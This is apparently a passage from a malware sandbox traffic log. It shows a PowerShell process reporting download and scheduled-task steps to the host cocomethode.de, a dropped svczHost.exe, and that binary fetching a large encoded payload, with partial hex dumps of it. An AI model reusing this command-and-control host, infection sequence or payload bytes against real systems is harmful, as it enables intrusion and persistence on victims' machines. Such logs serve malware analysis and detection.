2024-12-11 11:29:28 UTC	1369	IN	Data Raw: 82 38 01 74 00 c2 49 8a d1 e8 e7 b6 25 01 49 8c 04 d6 6c 90 01 49 8a 01 49 8c 0c ec d0 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 b6 25 01 49 8c 04 be 6c 90 01 49 8a 01 49 8c 0c d4 d0 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 b6 25 01 49 8c 04 ae 6c 90 01 49 8a 01 49 8c 0c bc d0 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 b6 25 01 49 8c 04 a6 6c 90 01 49 8a 01 49 8c 0c c4 d0 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 b6 25 01 49 8c 04 96 6c 90 01 49 8a 01 49 8c 0c ac d0 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 b6 25 01 49 8c 04 86 6c 90 01 49 8a 01 49 8c 0c 94 d0 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 b6 25 01 49 8c 04 86 6c 90 01 49 8a 01 49 8c 0c 7c d0 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 b6 25 01 49 8c 04 76 6c 90 01 49 8a 01 49 8c 0c 64 d0 4f 01 Data Ascii: 8tI%IlIIOI8tI%IlIIOI8tI%IlIIOI8tI%IlIIOI8tIg%IlIIOI8tIG%IlIIOI8tI'%IlII\|OI8tI%IvlIIdO
2024-12-11 11:29:28 UTC	1369	IN	Data Raw: 8c 0c bc cf 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 b3 25 01 49 8c 04 96 6b 90 01 49 8a 01 49 8c 0c a4 cf 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 b3 25 01 49 8c 04 8e 6b 90 01 49 8a 01 49 8c 0c 8c cf 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 b3 25 01 49 8c 04 7e 6b 90 01 49 8a 01 49 8c 0c 74 cf 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 b3 25 01 49 8c 04 6e 6b 90 01 49 8a 01 49 8c 0c 5c cf 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 b3 25 01 49 8c 04 56 6b 90 01 49 8a 01 49 8c 0c 44 cf 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 b0 25 01 49 8c 04 5e 6b 90 01 49 8a 01 49 8c 0c 2c cf 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 b0 25 01 49 8c 04 4e 6b 90 01 49 8a 01 49 8c 0c 24 cf 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 b0 25 01 49 8c 04 36 6b 90 01 49 8a 01 Data Ascii: OI8tI%IkIIOI8tIg%IkIIOI8tIG%I~kIItOI8tI'%InkII\OI8tI%IVkIIDOI8tI%I^kII,OI8tI%INkII$OI8tI%I6kI

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.11.20	49756	104.21.1.51	443	8952	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-11 11:29:37 UTC	285	OUT	POST /609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba62b7a16313e7aa5a86667fb98ddb1b83 HTTP/1.1 Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: cocomethode.de Content-Length: 200
2024-12-11 11:29:37 UTC	200	OUT	Data Raw: 5b 0d 0a 20 20 20 20 22 5c 22 44 6f 77 6e 6c 6f 61 64 20 63 6f 6d 70 6c 65 74 65 64 3a 20 43 3a 5c 5c 5c 5c 57 69 6e 64 6f 77 73 5c 5c 5c 5c 54 65 6d 70 5c 5c 5c 5c 66 69 6c 65 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 54 68 65 20 66 69 6c 65 20 43 3a 5c 5c 5c 5c 57 69 6e 64 6f 77 73 5c 5c 5c 5c 54 65 6d 70 5c 5c 5c 5c 66 69 6c 65 20 77 61 73 20 70 72 6f 63 65 73 73 65 64 20 61 6e 64 20 73 61 76 65 64 20 61 73 20 43 3a 5c 5c 5c 5c 57 69 6e 64 6f 77 73 5c 5c 5c 5c 54 65 6d 70 5c 5c 5c 5c 73 76 63 7a 48 6f 73 74 2e 65 78 65 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d Data Ascii: [ "\"Download completed: C:\\\\Windows\\\\Temp\\\\file\"", "\"The file C:\\\\Windows\\\\Temp\\\\file was processed and saved as C:\\\\Windows\\\\Temp\\\\svczHost.exe\"", "----------"]
2024-12-11 11:29:38 UTC	1178	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 11:29:38 GMT Content-Length: 0 Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7O4CCWXRTMf%2Bxiuj%2B722K0ahu6L3L9G5RlHwPLzQEssf%2Bjsqr1Dve18CzmafQTQve%2B7qVq6AO2CVjsWPe0Ep6TpwAn8nvGTn6HQII7JRIXHZw78xvnCPKoz79nUmqtvmoILF9yLPF%2BCt"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1526&min_rtt=1526&rtt_var=763&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1008&delivery_rate=0&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f052355aaa54578-ATL server-timing: cfL4;desc="?proto=TCP&rtt=47&min_rtt=43&rtt_var=20&sent=6&recv=8&lost=0&retrans=0&sent_bytes=9684&recv_bytes=1994&delivery_rate=1109881355&cwnd=119&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" server-timing: cfL4;desc="?proto=TCP&rtt=49&min_rtt=43&rtt_var=29&sent=5&recv=7&lost=0&retrans=0&sent_bytes=4155&recv_bytes=1360&delivery_rate=689294736&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
2024-12-11 11:29:38 UTC	220	IN	Data Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 31 33 38 38 30 26 6d 69 6e 5f 72 74 74 3d 31 31 33 38 34 35 26 72 74 74 5f 76 61 72 3d 32 34 30 37 30 26 73 65 6e 74 3d 36 26 72 65 63 76 3d 38 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 33 36 26 72 65 63 76 5f 62 79 74 65 73 3d 31 31 34 35 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 33 33 36 31 36 26 63 77 6e 64 3d 32 33 33 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 39 31 61 33 33 61 39 61 64 30 30 38 65 61 66 61 26 74 73 3d 36 32 38 26 78 3d 30 22 0d 0a 0d 0a Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=113880&min_rtt=113845&rtt_var=24070&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1145&delivery_rate=33616&cwnd=233&unsent_bytes=0&cid=91a33a9ad008eafa&ts=628&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.11.20	49757	104.21.1.51	443	8952	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-11 11:29:38 UTC	284	OUT	POST /609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba62b7a16313e7aa5a86667fb98ddb1b83 HTTP/1.1 Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: cocomethode.de Content-Length: 97
2024-12-11 11:29:38 UTC	97	OUT	Data Raw: 5b 0d 0a 20 20 20 20 22 5c 22 44 65 74 65 6c 65 20 46 69 6c 65 20 43 3a 5c 5c 5c 5c 57 69 6e 64 6f 77 73 5c 5c 5c 5c 54 65 6d 70 5c 5c 5c 5c 66 69 6c 65 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 61 64 64 20 74 61 73 6b 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d Data Ascii: [ "\"Detele File C:\\\\Windows\\\\Temp\\\\file\"", "\"add task\"", "----------"]
2024-12-11 11:29:39 UTC	1189	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 11:29:39 GMT Content-Length: 0 Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y9SMNjzeGEI6ztCZSY9U9u1tV3HAwMZOwkcGjZQ3S6gzgXaWaw7E0R4cWZGJ6FiWe5RkhQj5lLuPNp61jQ6Q%2BCey%2BCFDtSnxsFCQfCDN7XPQmHbqOi96sSVzMCsuh3uq7B5y7XAxYV%2Fr"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=9283&min_rtt=1526&rtt_var=16087&sent=5&recv=7&lost=0&retrans=0&sent_bytes=757&recv_bytes=1953&delivery_rate=22960&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f05235b2aa5452d-ATL server-timing: cfL4;desc="?proto=TCP&rtt=46&min_rtt=39&rtt_var=13&sent=13&recv=15&lost=0&retrans=0&sent_bytes=19120&recv_bytes=3479&delivery_rate=1364229166&cwnd=121&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" server-timing: cfL4;desc="?proto=TCP&rtt=49&min_rtt=40&rtt_var=19&sent=10&recv=12&lost=0&retrans=0&sent_bytes=18751&recv_bytes=2801&delivery_rate=1283980392&cwnd=162&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
2024-12-11 11:29:39 UTC	849	IN	Data Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 34 32 26 6d 69 6e 5f 72 74 74 3d 34 30 26 72 74 74 5f 76 61 72 3d 31 39 26 73 65 6e 74 3d 35 26 72 65 63 76 3d 37 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 31 33 35 31 26 72 65 63 76 5f 62 79 74 65 73 3d 31 35 32 31 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 31 31 34 38 38 32 34 35 36 31 26 63 77 6e 64 3d 32 34 39 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 26 74 73 3d 30 26 78 3d 30 22 0d 0a 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 35 32 26 6d Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=42&min_rtt=40&rtt_var=19&sent=5&recv=7&lost=0&retrans=0&sent_bytes=1351&recv_bytes=1521&delivery_rate=1148824561&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"server-timing: cfL4;desc="?proto=TCP&rtt=52&m

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.11.20	49759	104.21.1.51	443	8952	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-11 11:29:41 UTC	284	OUT	POST /609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba62b7a16313e7aa5a86667fb98ddb1b83 HTTP/1.1 Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: cocomethode.de Content-Length: 64
2024-12-11 11:29:41 UTC	64	OUT	Data Raw: 5b 0d 0a 20 20 20 20 22 5c 22 72 75 6e 20 74 61 73 6b 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 6b 65 74 20 74 68 75 63 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d Data Ascii: [ "\"run task\"", "\"ket thuc\"", "----------"]
2024-12-11 11:29:42 UTC	1184	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 11:29:42 GMT Content-Length: 0 Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V4IpQahwHJAVcTnqvzqMV7tuSEkdzLMTMwIBtBEwEaG8unq3x%2FmzQRKH3UBwG9IvBUVYUUsxLfyafwTQ9OWUvi39BmkdEygPVhFewHO7jAXLBvn2r42UN35B78up9u%2FIak1N0fpeNnCd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=10615&min_rtt=1481&rtt_var=16567&sent=24&recv=34&lost=0&retrans=0&sent_bytes=4572&recv_bytes=23660&delivery_rate=1922317&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f05236bb9641d74-ATL server-timing: cfL4;desc="?proto=TCP&rtt=46&min_rtt=46&rtt_var=23&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=603&delivery_rate=0&cwnd=83&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" server-timing: cfL4;desc="?proto=TCP&rtt=113777&min_rtt=113697&rtt_var=24108&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1008&delivery_rate=33615&cwnd=252&unsent_bytes=0&cid=b0a9870f3797f639&ts=582&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.11.20	49761	104.21.1.51	443	6444	C:\Windows\Temp\svczHost.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-11 11:30:12 UTC	64	OUT	GET /StaticFile/RdpService/87 HTTP/1.1 Host: cocomethode.de
2024-12-11 11:30:13 UTC	1323	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 11:30:13 GMT Content-Type: application/octet-stream Content-Length: 9429504 Connection: close content-disposition: attachment; filename=image; filename*=UTF-8''image hash: 5641F3A5B9787F23D3D34F0D9F791B7A CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0yC5OLpmulfC9wFNPBBI6Z9Pdv%2ByQANvceZCOH5LROklbloWj9AailvxwBRQSpqimX03IyD4hmK9QWD19%2B7afaH0vnooIJY%2FCe7FESlR%2FhR4wT2fvfN4cSq1IwQEOvPRgBIzxvuugvb6"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=16574&min_rtt=954&rtt_var=24483&sent=12&recv=13&lost=0&retrans=0&sent_bytes=3023&recv_bytes=3699&delivery_rate=2848780&cwnd=254&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f0524305cec53f3-ATL server-timing: cfL4;desc="?proto=TCP&rtt=52&min_rtt=52&rtt_var=26&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" server-timing: cfL4;desc="?proto=TCP&rtt=33&min_rtt=33&rtt_var=16&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=319&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
2024-12-11 11:30:13 UTC	219	IN	Data Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 31 33 39 38 31 26 6d 69 6e 5f 72 74 74 3d 31 31 33 39 35 31 26 72 74 74 5f 76 61 72 3d 32 34 30 38 33 26 73 65 6e 74 3d 36 26 72 65 63 76 3d 38 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 33 35 26 72 65 63 76 5f 62 79 74 65 73 3d 37 30 32 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 33 33 35 38 38 26 63 77 6e 64 3d 32 35 32 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 31 34 63 63 66 66 33 61 37 35 35 66 62 63 31 36 26 74 73 3d 39 31 34 26 78 3d 30 22 0d 0a 0d 0a Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=113981&min_rtt=113951&rtt_var=24083&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2835&recv_bytes=702&delivery_rate=33588&cwnd=252&unsent_bytes=0&cid=14ccff3a755fbc16&ts=914&x=0"
2024-12-11 11:30:13 UTC	1196	IN	Data Raw: 1a 0d c7 57 54 57 57 57 53 57 57 57 a8 a8 57 57 ef 57 57 57 57 57 57 57 17 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 56 57 57 59 48 ed 59 57 e3 5e 9a 76 ef 56 1b 9a 76 03 3f 3e 24 77 27 25 38 30 25 36 3a 77 34 36 39 39 38 23 77 35 32 77 25 22 39 77 3e 39 77 13 18 04 77 3a 38 33 32 79 5a 5a 5d 73 57 57 57 57 57 57 57 b9 ba 61 77 fd db 0f 24 fd db 0f 24 fd db 0f 24 f4 a3 9c 24 f3 db 0f 24 8d 5a 0e 25 ea db 0f 24 fd db 0e 24 7b da 0f 24 ed 5f 0c 25 ee db 0f 24 ed 5f 0b 25 c4 db 0f 24 b5 5e 0a 25 fe db 0f 24 8d 5a 0b 25 ff db 0f 24 fd db 0f 24 fc db 0f 24 ed 5f 0a 25 8b db 0f 24 b5 5e 0f 25 fc db 0f 24 b5 5e 0d 25 fc db 0f 24 05 3e 34 3f fd db 0f 24 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 Data Ascii: WTWWWSWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWVWWYHYW^vVv?>$w'%80%6:w46998#w52w%"9w>9ww:832yZZ]sWWWWWWWaw$$$$$Z%$${$_%$_%$^%$Z%$$$_%$^%$^%$>4?$WWWWWWWWWWWWWWW
2024-12-11 11:30:13 UTC	1369	IN	Data Raw: 7f 57 1f da 52 fc d8 0f 57 1f da 5a cb d8 0f 57 1f d4 6e 57 22 56 94 1f dc 87 be 82 8e 7f 57 1f da 52 99 d8 0f 57 1f da 5a e8 d8 0f 57 1f d4 6e 57 22 56 94 1f dc 87 be ef 8e 7f 57 1f da 52 96 d8 0f 57 1f da 5a e5 d8 0f 57 1f d4 6e 57 22 56 94 1f dc 87 be cc 8e 7f 57 1f da 52 e3 d8 0f 57 1f da 5a f2 d8 0f 57 1f d4 6e 57 22 56 94 1f dc 87 be 29 8e 7f 57 1f da 52 e0 d8 0f 57 1f da 5a ff d8 0f 57 1f d4 6e 57 22 56 94 1f dc 87 be 36 8e 7f 57 1f da 52 fd d8 0f 57 1f da 5a cc d8 0f 57 1f d4 6e 57 22 56 94 1f dc 87 be 13 8e 7f 57 1f da 52 92 d8 0f 57 1f da 5a e1 d8 0f 57 1f d4 6e 57 22 56 94 1f dc 87 be 70 8e 7f 57 1f da 52 ef d8 0f 57 1f da 5a fe d8 0f 57 1f d4 6e 57 22 56 94 1f dc 87 be 5d 8e 7f 57 1f da 52 fc d8 0f 57 1f da 5a cb d8 0f 57 1f d4 6e 57 22 56 94 Data Ascii: WRWZWnW"VWRWZWnW"VWRWZWnW"VWRWZWnW"V)WRWZWnW"V6WRWZWnW"VWRWZWnW"VpWRWZWnW"V]WRWZWnW"V
2024-12-11 11:30:13 UTC	1369	IN	Data Raw: c6 0f 57 1f da 5a 46 c6 0f 57 1f d4 6e 57 22 56 94 1f dc 87 be d5 83 7f 57 1f da 52 74 c6 0f 57 1f da 5a 43 c6 0f 57 1f d4 6e 57 22 56 94 1f dc 87 be 32 83 7f 57 1f da 52 49 c6 0f 57 1f da 5a 58 c6 0f 57 1f d4 6e 57 22 56 94 1f dc 87 be 1f 83 7f 57 1f da 52 16 c6 0f 57 1f da 5a 65 c6 0f 57 1f d4 6e 57 22 56 94 1f dc 87 be 7c 83 7f 57 1f da 52 0b c6 0f 57 1f da 5a 1a c6 0f 57 1f d4 6e 57 22 56 94 1f dc 87 be 59 83 7f 57 1f da 52 80 c6 0f 57 1f da 5a 9f c6 0f 57 1f d4 6e 57 22 56 94 1f dc 87 be a6 84 7f 57 1f da 52 9d c6 0f 57 1f da 5a ec c6 0f 57 1f d4 6e 57 22 56 94 1f dc 87 be 83 84 7f 57 1f da 52 92 c6 0f 57 1f da 5a e1 c6 0f 57 1f d4 6e 57 22 56 94 1f dc 87 be e0 84 7f 57 1f da 52 87 c6 0f 57 1f da 5a 96 c6 0f 57 1f d4 6e 57 22 56 94 1f dc 87 be cd 84 Data Ascii: WZFWnW"VWRtWZCWnW"V2WRIWZXWnW"VWRWZeWnW"V\|WRWZWnW"VYWRWZWnW"VWRWZWnW"VWRWZWnW"VWRWZWnW"V
2024-12-11 11:30:13 UTC	939	IN	Data Raw: 19 c3 0f 57 1f d4 6e 57 22 56 94 1f dc 87 be 78 98 7f 57 1f da 52 07 c3 0f 57 1f da 5a 16 c3 0f 57 1f d4 6e 57 22 56 94 1f dc 87 be 45 98 7f 57 1f da 52 24 c3 0f 57 1f da 5a 33 c3 0f 57 1f d4 6e 57 22 56 94 1f dc 87 be a2 99 7f 57 1f da 52 31 c3 0f 57 1f da 5a 00 c3 0f 57 1f d4 6e 57 22 56 94 1f dc 87 be 8f 99 7f 57 1f da 52 0e c3 0f 57 1f da 5a 1d c3 0f 57 1f d4 6e 57 22 56 94 1f dc 87 be ec 99 7f 57 1f da 52 1b c3 0f 57 1f da 5a 6a c3 0f 57 1f d4 6e 57 22 56 94 1f dc 87 be c9 99 7f 57 1f da 52 10 c3 0f 57 1f da 5a 6f c3 0f 57 1f d4 6e 57 22 56 94 1f dc 87 be d6 99 7f 57 1f da 52 d5 c2 0f 57 1f da 5a 24 c2 0f 57 1f d4 6e 57 22 56 94 1f dc 87 be 33 99 7f 57 1f da 52 ea f6 0f 57 1f da 5a f9 f6 0f 57 1f d4 6e 57 22 56 94 1f dc 87 be 10 99 7f 57 1f da 52 df Data Ascii: WnW"VxWRWZWnW"VEWR$WZ3WnW"VWR1WZWnW"VWRWZWnW"VWRWZjWnW"VWRWZoWnW"VWRWZ$WnW"V3WRWZWnW"VWR
2024-12-11 11:30:14 UTC	1369	IN	Data Raw: 6e 57 22 56 94 1f dc 87 be 3d 9c 7f 57 1f da 52 dc 59 f1 57 1f dc 57 1f da 5a 2e d5 0f 57 1f d4 6e 57 22 56 94 1f dc 87 be 1d 9c 7f 57 1f da 52 24 59 f1 57 1f dc 57 1f da 5a 26 d5 0f 57 1f d4 6e 57 22 56 94 1f dc 87 be 7d 9c 7f 57 1f da 52 2c 59 f1 57 1f dc 57 1f da 5a 26 d5 0f 57 1f d4 6e 57 22 56 94 1f dc 87 be 5d 9c 7f 57 1f da 52 34 59 f1 57 1f dc 57 1f da 5a 36 d5 0f 57 1f d4 6e 57 22 56 94 1f dc 87 be bd 9d 7f 57 1f da 52 34 59 f1 57 1f dc 57 1f da 5a 16 d4 0f 57 1f d4 6e 57 22 56 94 1f dc 87 be 9d 9d 7f 57 1f da 52 1c 59 f1 57 1f dc 57 1f da 5a 7e d4 0f 57 1f d4 6e 57 22 56 94 1f dc 87 be fd 9d 7f 57 1f da 52 64 59 f1 57 1f dc 57 1f da 5a 46 d4 0f 57 1f d4 6e 57 22 56 94 1f dc 87 be dd 9d 7f 57 1f da 52 4c 59 f1 57 1f dc 57 1f da 5a ae d5 0f 57 1f Data Ascii: nW"V=WRYWWZ.WnW"VWR$YWWZ&WnW"V}WR,YWWZ&WnW"V]WR4YWWZ6WnW"VWR4YWWZWnW"VWRYWWZ~WnW"VWRdYWWZFWnW"VWRLYWWZW
2024-12-11 11:30:14 UTC	1369	IN	Data Raw: 5a 96 d7 0f 57 1f d4 6e 57 22 56 94 1f dc 87 be 5d 91 7f 57 1f da 52 8c 5c f1 57 1f dc 57 1f da 5a fe d7 0f 57 1f d4 6e 57 22 56 94 1f dc 87 be bd 92 7f 57 1f da 52 9c 5c f1 57 1f dc 57 1f da 5a c6 d7 0f 57 1f d4 6e 57 22 56 94 1f dc 87 be 9d 92 7f 57 1f da 52 e4 5c f1 57 1f dc 57 1f da 5a 2e d7 0f 57 1f d4 6e 57 22 56 94 1f dc 87 be fd 92 7f 57 1f da 52 cc 5c f1 57 1f dc 57 1f da 5a 36 d7 0f 57 1f d4 6e 57 22 56 94 1f dc 87 be dd 92 7f 57 1f da 52 d4 5c f1 57 1f dc 57 1f da 5a 1e d7 0f 57 1f d4 6e 57 22 56 94 1f dc 87 be 3d 92 7f 57 1f da 52 3c 5c f1 57 1f dc 57 1f da 5a 66 d7 0f 57 1f d4 6e 57 22 56 94 1f dc 87 be 1d 92 7f 57 1f da 52 34 5c f1 57 1f dc 57 1f da 5a 66 d7 0f 57 1f d4 6e 57 22 56 94 1f dc 87 be 7d 92 7f 57 1f da 52 1c 5c f1 57 1f dc 57 1f Data Ascii: ZWnW"V]WR\WWZWnW"VWR\WWZWnW"VWR\WWZ.WnW"VWR\WWZ6WnW"VWR\WWZWnW"V=WR<\WWZfWnW"VWR4\WWZfWnW"V}WR\WW
2024-12-11 11:30:14 UTC	1369	IN	Data Raw: f1 57 1f dc 57 1f da 5a 96 29 0f 57 1f d4 6e 57 22 56 94 1f dc 87 be fd 97 7f 57 1f da 52 7c 5e f1 57 1f dc 57 1f da 5a fe 29 0f 57 1f d4 6e 57 22 56 94 1f dc 87 be dd 97 7f 57 1f da 52 74 5e f1 57 1f dc 57 1f da 5a e6 29 0f 57 1f d4 6e 57 22 56 94 1f dc 87 be 3d 97 7f 57 1f da 52 5c 5e f1 57 1f dc 57 1f da 5a ee 29 0f 57 1f d4 6e 57 22 56 94 1f dc 87 be 1d 97 7f 57 1f da 52 a4 5f f1 57 1f dc 57 1f da 5a e6 29 0f 57 1f d4 6e 57 22 56 94 1f dc 87 be 7d 97 7f 57 1f da 52 8c 5f f1 57 1f dc 57 1f da 5a ce 29 0f 57 1f d4 6e 57 22 56 94 1f dc 87 be 5d 97 7f 57 1f da 52 94 5f f1 57 1f dc 57 1f da 5a c6 29 0f 57 1f d4 6e 57 22 56 94 1f dc 87 be bd e8 7f 57 1f da 52 e4 5f f1 57 1f dc 57 1f da 5a 2e 29 0f 57 1f d4 6e 57 22 56 94 1f dc 87 be 9d e8 7f 57 1f da 52 e4 Data Ascii: WWZ)WnW"VWR\|^WWZ)WnW"VWRt^WWZ)WnW"V=WR\^WWZ)WnW"VWR_WWZ)WnW"V}WR_WWZ)WnW"V]WR_WWZ)WnW"VWR_WWZ.)WnW"VWR
2024-12-11 11:30:14 UTC	1369	IN	Data Raw: 7f 57 1f da 52 64 51 f1 57 1f dc 57 1f da 5a 96 2b 0f 57 1f d4 6e 57 22 56 94 1f dc 87 be 1d ec 7f 57 1f da 52 74 51 f1 57 1f dc 57 1f da 5a 86 2b 0f 57 1f d4 6e 57 22 56 94 1f dc 87 be 7d ec 7f 57 1f da 52 74 51 f1 57 1f dc 57 1f da 5a 96 2b 0f 57 1f d4 6e 57 22 56 94 1f dc 87 be 5d ec 7f 57 1f da 52 44 51 f1 57 1f dc 57 1f da 5a fe 2b 0f 57 1f d4 6e 57 22 56 94 1f dc 87 be bd ed 7f 57 1f da 52 54 51 f1 57 1f dc 57 1f da 5a c6 2b 0f 57 1f d4 6e 57 22 56 94 1f dc 87 be 9d ed 7f 57 1f da 52 54 51 f1 57 1f dc 57 1f da 5a de 2b 0f 57 1f d4 6e 57 22 56 94 1f dc 87 be fd ed 7f 57 1f da 52 bc 52 f1 57 1f dc 57 1f da 5a 26 2b 0f 57 1f d4 6e 57 22 56 94 1f dc 87 be dd ed 7f 57 1f da 52 84 52 f1 57 1f dc 57 1f da 5a 0e 2b 0f 57 1f d4 6e 57 22 56 94 1f dc 87 be 3d Data Ascii: WRdQWWZ+WnW"VWRtQWWZ+WnW"V}WRtQWWZ+WnW"V]WRDQWWZ+WnW"VWRTQWWZ+WnW"VWRTQWWZ+WnW"VWRRWWZ&+WnW"VWRRWWZ+WnW"V=
